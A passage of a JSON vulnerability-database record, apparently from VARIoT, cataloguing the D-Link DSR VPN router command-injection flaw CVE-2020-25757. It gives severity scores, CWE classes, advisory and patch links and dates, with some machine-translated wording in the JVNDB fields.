            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-25757",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-1107",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17. plural  D-Link For routers made OS There are command injection vulnerabilities and input verification vulnerabilities.Information is obtained, information is tampered with, and service is disrupted  (DoS) It may be put into a state",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757",
        "trust": 2.4
      },
      {
        "db": "DLINK",
        "id": "SAP10195",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "id": "VAR-202012-0331",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5056818
  },
  "last_update_date": "2021-12-17T04:57:47.164000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
        "trust": 0.8,
        "url": "https://www.dlink.com/en/security-bulletin"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      },
      {
        "problemtype": "Incorrect input confirmation (CWE-20) [NVD Evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": "OS Command injection (CWE-78) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
      },
      {
        "trust": 1.6,
        "url": "https://www.dlink.com/en/security-bulletin"
      },
      {
        "trust": 1.6,
        "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25757"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-15T20:15:00",
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "date": "2020-12-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "date": "2021-08-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-21T11:39:00",
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "date": "2020-12-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      },
      {
        "date": "2021-08-27T08:23:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural \u00a0D-Link\u00a0 In a router made by \u00a0OS\u00a0 Command injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1107"
      }
    ],
    "trust": 0.6
  }
}